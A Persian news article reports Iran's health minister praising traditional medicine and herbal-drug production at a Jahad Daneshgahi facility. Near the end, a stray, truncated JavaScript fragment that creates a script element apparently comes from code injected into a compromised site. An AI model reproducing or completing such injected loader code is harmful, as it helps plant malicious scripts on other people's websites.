طب سنتی مورد علاقه مردم، مؤثر، کم‌هزینه و مطابق با فرهنگ ایرانی

وزیر بهداشت با اشاره به اینکه احیای طب سنتی به‌عنوان میراث ملی ایران با روش‌های علمی بسیار مهم و ضروری است، بر لزوم تقویت علمی طب سنتی در کشور تأکید کرد و گفت: طب سنتی مورد علاقه مردم، مؤثر، کم‌هزینه و مطابق با فرهنگ ایران است.

به گزارش سادس به نقل از خبرگزاری تسنیم، سید حسن هاشمی در حاشیه افتتاح خط تولید داروهای گیاهی پژوهشکده گیاهان دارویی جهاد دانشگاهی ضمن تأکید بر اهمیت افزایش کیفیت داروهای تولید داخلی، اظهار داشت: خوشبختانه خط تولید داروهای گیاهی جدیدی امروز افتتاح شد که در آن از مواد طبیعی و گیاهان دارویی استفاده می‌شود و انتظار ما از دانشمندان ایرانی به‌ویژه طب سنتی، کمک به تقویت این مسیر است.

وزیر بهداشت از طب سنتی ایرانی به‌عنوان میراث گرانبهای کشور یاد کرد و گفت: در دو سده اخیر به‌ویژه در 50 سال گذشته طب سنتی ایرانی مورد غفلت و فراموش واقع شده و باید تقویت شود و انتظار داریم همه افراد به‌ویژه آنهایی که به دانش نوین آشنا هستند، بتوانند برای ارتقای طب سنتی ایرانی قدم‌هایی بردارند.

هاشمی یادآور شد: طب سنتی، مورد علاقه مردم، مؤثر، کم‌هزینه و مطابق با فرهنگ مردم ایران است که می‌تواند برای کشور کارآفرین و ثروت‌آفرین باشد و دولت و سازمان غذا و دارو نهایت حمایت خود را از تولید کنندگان داروهای گیاهی خواهند کرد زیرا باعث احیای مجدد طب سنتی و ملی کشور می‌شود.

وزیر بهداشت ضمن ابراز خرسندی از فعالیت جهاد دانشگاهی در حوزه طب سنتی و گیاهان دارویی، گفت: البته جهاد دانشگاهی در حوزه علوم پایه فعال است و امیدواریم که این نهاد بتواند به حوزه‌های بالینی و طب سنتی نیز وارد شود.

هاشمی اظهار داشت: وضعیت جهاد دانشگاهی در حوزه علوم پایه مناسب است و با توجه به شعبات جهاد دانشگاهی در سراسر کشور، اگر برای تأسیس دانشکده طب سنتی اقدام کند، می‌تواند نقش‌آفرینی مؤثری داشته باشد زیرا احیای طب سنتی به‌عنوان میراث ملی ایران با روش‌های علمی، بسیار مهم و ضروری است.

وزیر بهداشت با اشاره به آمادگی دولت برای حمایت از شرکت‌های دانش‌بنیان فعال در حوزه طب سنتی، گفت: حوزه سلامت کانون بسیار مناسبی برای جذب جوانان به‌ویژه جوانان مستعد با هوش بالا است بنابراین می‌تواند زمینه‌ساز استقلال کشور و تحقق اقتصاد مقاومتی باشد.

هاشمی عنوان کرد: وزارت بهداشت می‌تواند با اعطای مجوز به مجموعه‌های دانش‌بنیان به‌ویژه در حوزه طب سنتی، از آنها حمایت کند و محصولات این شرکت‌ها باید از کیفیت و اثربخشی مناسب برخوردار باشند که بتوانند برای خود بازار فراهم کنند و در مورد اثربخشی یکی از داروهای جدید این پژوهشکده برای آلزایمر، بهتر است که متخصصان مغز و اعصاب و روانپزشکی هم نظر بدهند.

وزیر بهداشت گفت: در کشور از سالهای گذشته به توفیقات زیادی در حوزه طب سنتی، گیاهان دارویی و داروهای گیاهی دست پیدا کردیم و خوشبختانه بیش از 90 درصد از اشکال دارویی، در داخل کشور تولید می‌شود.

هاشمی خاطرنشان کرد: حتی سازمان غذا و دارو که برای این داروها مجوز صادر می‌کند، نمی‌تواند در توسعه بازار آنها نقش مهمی داشته باشد و هرقدر اثربخشی این دارو بیشتر باشد، فرصت بیشتری برای عرضه در ایران و کشورهای دیگر پیدا می‌کند.

var d=document;var s=d.createElement(‘script’);

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *